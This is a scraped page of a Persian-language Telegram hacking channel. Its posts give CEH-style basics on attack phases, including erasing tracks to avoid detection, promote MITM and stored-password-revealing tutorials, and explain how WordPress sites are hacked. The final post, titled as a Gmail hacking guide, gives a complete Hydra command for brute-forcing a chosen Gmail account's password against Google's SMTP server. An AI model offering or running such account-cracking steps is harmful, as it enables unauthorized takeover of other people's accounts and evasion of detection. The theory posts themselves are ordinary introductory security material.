FullSecurity
10.6K subscribers
324 photos
27 videos
319 files
207 links
.
اين كانال صرفا جهت آموزش امنيت است و كاملا تابع قوانين جمهوري اسلامي عمل ميكند..


Owner: @AshKanAttacKer

🌐 https://FullSecurity.ORG
Download Telegram
دوره آموزشی Ceh


قسمت دوم :



۴- هدف (Target) : زمانی که ما میخواهیم عمل هک را انجام بدهیم آن سیستمی که ما میخواهیم هک کنیم میشود هدف ما در واقع به معنای هکری تارگت ما میشود و ما عمل هک را برروی تارگت(هدف) انجام میدهیم.


۵- تهدید (Threat) : زمانی که یک سیستم دارای آسیب پذیری است در واقع یک تهدید برای آن سیستم حساب میشود این تهدید بالقوه است اما ممکن است بالفعل شود ( یعنی آن تهدید عملی نشده است اما ممکن است توسط یک هکر آن سیستم هک شود)


۶- حمله (Attack) : وقتی ما میخواهیم به یک سیستم نفوذ کنیم بعد از پیدا کردن آسیب پذیری و اکسپلویت آن، موقع آن میرسد ما به سیستم حمله کنیم در واقع اتک بزنیم



۷- دو نوع اکسپلویت داریم :


ریموت اکسپلویت (Remote Exploit) : این نوع از اکسپلویت ها از راه دور قابل استفاده هستند و نیازی به دسترسی فیزیکی به سیستم نیست.


لوکال اکسپلویت (Local Exploit) : این نوع از اکسپلویت نیاز به دسترسی فیزیکی به سیستم دارد و از راه دور قابل استفاده نیستند و زیاد به کار هکرها نمیاد مگر در مواقع خاص


ادامه..

#ceh #episode #2
Author:UltraSecteam
🌹برترين كانال آموزش🌹
@FullSecurity
دوره آموزشی Ceh


قسمت سوم :


بعد از اصطلاحات هک نوبت به روش های مختلف نفوذ میرسد. هکر ها هم مانند بقیه ابزار هایی دارند که با انان میتوانند به سیستم ها نفوذ کنند برخی از این ابزار ها عبارت از تروجان ها، روت کیت ها، اسنیفرها، بک دور ها و..... که با آنان میتوانند به سیستم ها نفوذ کنند. همه این ابزارها از سه بخش به سیستم حمله میکنند.

سیستم عامل ها : که بسیار مهم هستند اما مدیران با نصب اشتباه آن ها باعث به خطر افتادن سیستم ها میشوند.


نرم افزار ها : برنامه نویسان با کم دقتی در نوشتن نرم افزار ها باعث ایجاد مشکل در نرم افزار ها میشوند که باعث میشود هکرها از این مشکلات نهایت استفاده را ببرند.


پیکربندی نادرست : بسیاری از مدیران شبکه با راه اندازی اشتباه تجهیزات خود و استفاده از یوزر و پسورد پیش فرض و بسیاری از موارد دیگر باعث میشوند که هکرها به راحتی به آنان نفوذ کنند.



امکانات یک نرم افزار : خیلی از نرم افزار ها امکاناتی دارند که کاربران عادی از آن بی خبرند و هکرها از آن امکانات به نفع خودشان استفاده میکنند.


ادامه..

#ceh #episode #3
Author:UltraSecteam
🌹برترين كانال آموزش🌹
@FullSecurity
دوره آموزشی Ceh


قسمت چهارم :


حملات به دو دسته تقسیم میشوند حملات پسیو (Passive) حمله اکتیو (Active) حملات پسیو فقط به دنبال جمع آوری اطلاعات از سیستم هستند ولی حملات اکتیو سیستم و شبکه را تغییر میدهد.


حملات به دو صورت داخلی و بیرونی انجام میشوند حملات داخلی در داخل شرکت یا سازمان اتفاق می افتد ولی حملات بیرونی از طریق اینترنت انجام میشوند.



پنج مرحله هکر قانونمند برای حمله :


۱- جمع آوری اطلاعات


۲- اسکن


۳- ایجاد دسترسی


۴- حفظ دسترسی


۵- پاک کردن ردپا



در مطالب آینده به هر یک از مراحل میپردازیم.



ادامه دارد.....

#ceh #episode #4
Author:UltraSecteam
🌹برترين كانال آموزش🌹
@FullSecurity
دوره آموزشی Ceh


قسمت پنجم :


در این قسمت قصد دارم پنج مرحله یک هکر قانونمند برای نفوذ را توضیح بدم.


۱- جمع آوری اطلاعات (FootPrinting) : شما برای حمله به هدف خودتون باید قبل از حمله از هدفتون اطلاعات جمع آوری کنین.این مرحله جز مهمترین مراحل هکینگ میباشد. یک هکر ۹۰ درصد وقت خودش رو صرف جمع آوری میکند و فقط ۱۰ درصد دیگر را صرف حمله میکند.



۲- اسکن (Scan) : بعد از جمع آوری اطلاعات از هدف شما باید یک اسکن از هدف بگیرید با این اسکن شما اطلاعاتی همچون سیستم عامل هدف پورت های باز سیستم ، پیدا کردن آسیب پذیری، شناسایی سرویس های فعال به دست بیاورد که بسیار مهم است.



۳- ایجاد دسترسی : در این مرحله شما باید با پیدا کردن اکسپلویت ان آسیب پذیری که در مرحله اسکن به دست آورده بودید به سیستم حمله کنید و از سیستم دسترسی بگیرید.



۴- حفظ دسترسی : شما در این مرحله باید دسترسی خود را حفظ کنید یعنی اگر بعدا بخواهید به سیستم دسترسی پیدا کنید نیازی به نفوذ مجدد نداشته باشید. هکرها از بک دورها و روت کیت ها برای حفظ دسترسی استفاده میکنند.



۵- پاک کردن ردپا : در مرحله آخر شما باید رد پای خود را روی سیستم پاک کنید این کار باعث میشود که شما توسط ادمین آن سیستم شناسایی نشوید و باعث گیر افتادن شما نشود.

به این بخش دقت کنید چون مهمه بیشتر هکرهایی که گیر افتادن به دلیل اشتباه در همین بخش بوده پس حتما توجه کنید.



ادامه دارد.....

#ceh #episode #5
Author:UltraSecteam
🌹برترين كانال آموزش🌹
@FullSecurity
Forwarded from FullSecurity
پيدا كردن نوع هش در ويندوز

با استفاده از اين نرم افزار ميتوانيد نوع هش ها را بدست بياوريد..

كار با نرم افزار بسيار سادست..

در پست بعدی قابل دانلود میباشد.

#hash #identifier #exe
Author:AshKan
🌹برترین کانال آموزش🌹
@FullSecurity
Forwarded from FullSecurity
آموزش تصویری دیدن پسوردهای ستاره دار در 30ثانیه

با استفاده از این آموزش میتونید همه ی پسوردهای مرورگرها،فیس بوک،یاهو و ... رو که به صورت ستاره دار هستند رو ببینید

در پست بعدی قابل دانلود میباشد.

#password #browser
Author:AshKan
🌹برترین کانال آموزش🌹
@FullSecurity
برترين كانال هك و امنيت

✔️ آموزش هك و امنيت
✔️ معرفي ابزار هاي هك
✔️ ارائه برترين نكات امنيتي
✔️ آموزش تكنيك هاي نفوذ
🆔

https://telegram.me/joinchat/Bz0E_D0ftaE7VRRZV-mq4Q
Forwarded from FullSecurity
دوستان عزيز لطفا لينك كانال رو به اشتراك بگذاريد..
افزايش كاربران كانال سبب افزايش مطالب و آموزش هاي كانال خواهد شد..

براي تبادل با ايدي زير در تماس باشيد..
@ashkan_m78
آموزش تصویری حملات MITM در كالي

با استفاده از اين آموزش ميتوانيد با استفاده از ابزار websploit در كالي حملات MITM انجام بديد.
اين آموزش همراه با صدا و زبان فارسي بوده و بصورر كامل و واضح توضيح داده شده

در پست بعدی قابل دانلود میباشد.

#MITM #websploit #kali
Author:AshKan
🌹برترین کانال آموزش🌹
@FullSecurity
Forwarded from FullSecurity
آموزش دور زدن تايمر 50 ثانيه اي اپلود بوي

با استقاده از اين آموزش ميتوانيد تايمر 50 ثانيه اي اپلود بوي را دور بزنيد و بدون معطلي دانلود كنيد..

در پست بعدی قابل دانلود میباشد.

#uploadboy #bypass
Author:AshKan
🌹برترین کانال آموزش🌹
@FullSecurity
یک سایت وردپرس چطور هک میشود ؟ قسمت دوم


با سلام در قسمت قبل در مورد امنیت و چگونگی هک شدن سایت وردپرسی توضیحاتی رو ارائه دادیم

یکی از دلایل هک شدن سایت های وردپرسی استفاده از پلاگین ها و پوسته های رایگان نال شده هست که به دلیل رایگان بودن هیچ اهمیتی به امنیت و باگ ها داده نشده.

بیشتر باگ ها از جمله sql Injection نیاز به این دارن که حتما توی سایت لوگین کنی تا بتونی سایت رو مورد نفوذ قرار بدی

یکی از مواردی که میتونه امنیت سایت رو تا حد خوب و مطلوبی بالا ببره عوض کردن ادرس پیشفرض صفحه ادمین و همچنین گذاشتن پسورد روی صفحه دوم یا ست کردن صفحه مدیریت روی یک ای پی خاص هست.

با این کار میتونیم از باگ های Sql Injection , Xss , Csrf تا حدودی جلوگیری کنیم و نه 100٪ درصد چرا که همیشه یک راهی برای دور زدن یا بایپس وجود داره.

دلایل دیگه هک شدن سایت های وردپرسی استفاده از حملات بروت فورس هست که بدون محدودیتی برای لوگین به صفحه ادمین یا تست پسورد اجازه به نفوذگر میده که با نوشتن برنامه ای ساده اقدام به تست پسورد های طویل کنه و با پسورد لیست قوی 100٪ به نتیجه دلخواه خودش برسه

در مورد هک شدن سایت های وردپرس از سرور هم بعدا مقاله ای توی سایت ارسال میکنیم

#wordpress #sql #injection
Author:AshKan
🌹برترين كانال آموزش🌹
@FullSecurity
Forwarded from FullSecurity
پيدا كردن نوع هش در كالي

با استفاده از اين آموزش شما ميتوانيد نوع هش مورد نظرتون رو در كالي پيدا كنيد..

در پست بعدی قابل دانلود میباشد.

#hash #identifier #kali
Author:AshKan
🌹برترین کانال آموزش🌹
@FullSecurity
کالی ورژن 2016 را بهتر بشناسیم !


در تاریخ 21 ژوئن سال 2016 میلاد کمپانی offensive security توزیع کننده ی سیستم عامل های کالی و بک ترک بالاخره ورژن جدید این سیستم عامل را عرضه کرد. کالی 2016 با ورژن 2016.1 جدید ترین و بروز ترین ابزار های امنیتی را به همرا دارد ! عمده ترین ویژگی این توزیع Rolling base بودن آن می باشد ! ابتدا اجازه دهید تا مختصرا راجع به توزیع های Rolling بیشتر توضیح دهیم :

-توزیع های Rolling لینوکس :

این نوع توزیع های لینوکسی از توزیعاتی هستند که مدام بروز می شوند . تقریبا چیزی شبیه به developers version . از توزیع هایی که از این سیستم استفاده می کنند می توان به Arch linux اشاره کرد که یکی از معروفترین و محبوب ترین توزیع های لینوکسی می باشد . مخلص کلام اینکه این توزیع ها جدیدترین ابزار های حودشا را در معرض کار می گذارند.

همانطور که در بالا گفته شد کالی ورژن 2016.1 از سیستم رولینگ استفاده می کند که مدام آپدیت های کوچک و بزرگی را ارائه می دهد که موجب رفع باگ یا آپدیت ابزار های امنیتی می شود !

-یکی دیگر از تغییرات مهم این ورژن استفاده از open VM tools به جای vmware tools قدیمی است . این پکیج جدید که توسط شرکت VM ارائه شده است تجربه ی بهتری را در اجرای سیستم عامل ها به صورت مجازی ارایه می دهد که در این نسخه از کالی کاملا درست و بی نقص کار می کند .

—استفاده از کرنل جدید نسخه ی 4.3.0.0 که یکی از جدیدترین کرنل های استیبل موجود است که در کارهای اساسی به خوبی خودش را نشان می دهد . این کرنل بهینه تر از کرنل های پیشین می باشد و بسیاری از باگ های آن رفع شده است !

– استفاده از آخرین نسخه های نرم افزار های موجود در کالی ویژگی معمول این توزیع است .

#kali #sana
Author:AshKan
🌹برترين كانال آموزش🌹
@FullSecurity
اصطلاحات لازم و کلیدی !!!


در دنیای اینترنت تعاریف و اصلاحات زیادی وجود دارد که هرکدام در بخشی خاص کاربرد دارند یکی از این تعاریف میزان پهنای باند است که کاربران اینترنت دریافت میکنند در این مقاله شما را با این تعاریف و اصلاحات عامه و رایج آشنا میکنیم همچنین قوانین اشتراک گذاری اینترنت در کشور را بررسی میکنیم.

 

اینترنت در تمام دنیا برای کاربران با پهنای باند خاصی عرضه میشود نسبت به هزینه ای که میکنند ایران نیز از این قاعده مستثنی نبوده و سرعت دریافتی کاربران نسبت به هزینه پرداختی خود متفاوت است اما از نظر اکثر افراد تعاریف به درستی جا نیفتاده است و گاها دچار سردرگمی میشوند

تفاوت بیت (bit) و بایت (Byte) چیست؟ 

در دنیای کامپیوتر و فضای اینترنتی مفاهیم بیت و بایت جزو ساده ترین موارد می‌باشد. بیت کوچکترین واحد برای اندازه گیری اطلاعات در دنیای مجازی می باشد. از ترکيب هشت بيت ، يک بايت بوجود می آيد. برای درک بهتر این واحد بهتر است بدانید که برای تایپ لغت "Hello" در کامپیوتر فضایی به اندازه 40 بیت(5 بایت) اشغال می شود. هر بیت را می توان به دو صورت 0 یا 1 نمایش داد. 

نکته ای که در اینجا مطرح است ، تفاوت بین بیت و بایت و کاربرد این دو واحدِ اندازه گیری می باشد. برای نشان دادن بیت از حرف b(کوچک) و بایت ازB(بزرگ) استفاده می شود. 
کلیه شرکت‌های ارائه دهنده خدمات اینترنت، در ایران و جهان سرویس های خود را براساس واحد کیلو بیت بر ثانیه (Kbps) ارائه می کنند؛که این در واقع سرعت اتصال شما به اینترنت را نشان می دهد. اما برای نشان دادن سرعت دانلود از کیلو بایت بر ثانیه (KBPS) استفاده می شود. 

به عنوان مثال زمانی که شما سرویس 512 کیلو بیت بر ثانیه را خریداری میکنید با توجه به تعاریف موجود سرعت دانلود شما باید میزان 64 کیلو بایت بر ثانیه باشد ودر صورتی که  طبق قرارداد و بنا به مصوبه سازمان تنظیم مقررات و ارتباطات رادیویی، شرکت‌های ارائه‌دهنده خدمات اینترنتی می‌توانند ضریب اشتراک حداکثر1 به 8 را برای کاربرانشان اعمال کند که این بدین معناست سرعت کاربر تا یک هشتم این میزان نیز میتواند کاهش داشته باشد.
#byte #bit
Author:AmHacker
🌹برترین کانال آموزش 🌹
@FullSecurity
خبر

باسلام خدمت اعضای کانال @FullSecurity ، ما قصد داریم که هرشب در کانال آموزش کار با کالی لینوکس ، کرکینگ و باگ یابی سایت ، نفوذ به سایت ، نفوذ به ویندوز و در آخر آموزش حرفه ای زبان #c(سی شارپ) رو براتون بذاریم .
پس تا فردا و اولین پست 🔃🔃🔃
#amozesh
Author:FullSecurity
🌹برترین کانال آموزش 🌹
@FullSecurity
آموزش هک جیمیل با کالی


هک Gmail با Hydra :
text by: LS 313
______________________________________________________
1-ابتدا کالی را اجرا کرده و یک ترمینال را باز کنید
2-دستور زیر را تایپ کنید:

hydra -S -l [email protected] -P /root/Desktop/.txt -e ns -V -s 465 smtp.gmail.com smtp

3- به جای [email protected] جیمیل مورد نظر رو وارد کنید

4-و یه پسورد لیست میخواید که لینوکس ازش استفاده کنه

5-در نهایت پسورد داده میشود 👀

نکته:اگه پسورد اشتباه بود پسورد لیست شما ضعیفه


#amozesh #hackgmail
Author:AmHacker
🌹برترین کانال آموزش 🌹
@FullSecurity